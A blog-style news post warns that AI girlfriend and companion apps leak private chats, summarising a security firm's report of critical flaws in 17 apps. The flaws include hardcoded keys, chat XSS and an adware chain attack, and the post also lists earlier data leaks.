Tuesday, March 24, 2026

Beware of AI Girlfriends: They're Leaking Your Private Messages!

Beware of AI Girlfriends: They're Leaking Your Private Messages!

Millions of people are turning to artificial intelligence for companionship, but these same digital sweethearts are silently leaking their deepest secrets to hackers. Researchers have revealed that most AI girlfriend apps have critical security flaws.

Artificial intelligence has permeated almost every aspect of daily life, and we will see it enter personal spaces even more. Unfortunately, hackers and privacy risks are advancing at the same pace, and millions of users trusting so-called AI companion apps pose a significant privacy risk.

AI Companion Apps Exceed 150 Million Downloads

Security firm Oversecured reported that they found 14 critical and 311 high-severity vulnerabilities in 17 popular AI dating apps, which collectively have over 150 million downloads on Google Play. In at least six popular AI girlfriend apps, attackers can access user conversations, which are often highly personal, explicit, and linked to real identities.

  • AI roleplay platform: Over 50 million downloads
  • AI card game / chat: Over 50 million downloads
  • Open dialogue platform: Over 10 million downloads
  • Multi-voice AI chat: Over 10 million downloads
  • AI productivity agent: Over 10 million downloads
  • AI friend / partner: Over 10 million downloads
  • AI assistant chatbot: Over 10 million downloads
  • AI girlfriend / character: Over 5 million downloads
  • Virtual AI friend: Over 1 million downloads
  • AI dating simulator: Over 1 million downloads
  • Realistic AI companion: Over 1 million downloads
  • AI Q&A chatbot: Over 1 million downloads
  • Conversational AI coach: Over 500 thousand downloads
  • AI companion with memory: Over 100 thousand downloads
  • AI dating companion: Over 100 thousand downloads
  • AI romance metaverse: Over 100 thousand downloads
  • AI romance character: Over 100 thousand downloads

14 Critical Security Flaws in 17 Apps

Users who trust AI models as their romantic partners openly share their sexual fantasies, describe their relationships, and more. All these private conversations are typically stored and associated with accounts. Vulnerabilities discovered in 10 of the 17 apps analyzed by researchers create a pathway to users' conversations with AI bots. This leads users to share their most vulnerable truths with systems that may be less secure than a basic messaging app.

According to researchers, an AI companion app with over 10 million downloads comes with predefined credentials, including an OpenAI API token and a Google Cloud private key, directly embedded in its code. Extracting these requires little more than basic reverse engineering.

Another app allows for a cross-site scripting (XSS) vulnerability in its chat interface, enabling an attacker to inject malicious code into what appears to be a private conversation. This can lead to real-time message interception, session hijacking, and even the creation of fake responses within the chat.

A third vulnerability allows for arbitrary file theft by exposing local chat databases, cached photos, voice messages, and authentication tokens. The affected app is known for hosting explicit content.

Perhaps most strikingly, an app with 50 million downloads was found to have a vulnerability through adware. Malicious advertising can trigger internal components and directly query databases storing user conversations; this is a chain attack carried out through something as mundane as an in-app banner.

According to researchers, most of the newly discovered vulnerabilities remain unpatched.

The security flaws uncovered so far may only be the tip of the iceberg. High-profile data leaks linked to AI girlfriend apps have already occurred. Reportedly, the AI girlfriend site Muah.ai exposed users' explicit fantasies and private bots. Researchers had previously revealed that Chattee Chat and GiMe Chat apps leaked over 43 million messages and more than 600,000 photos and videos from over 400,000 users.

0 Comments: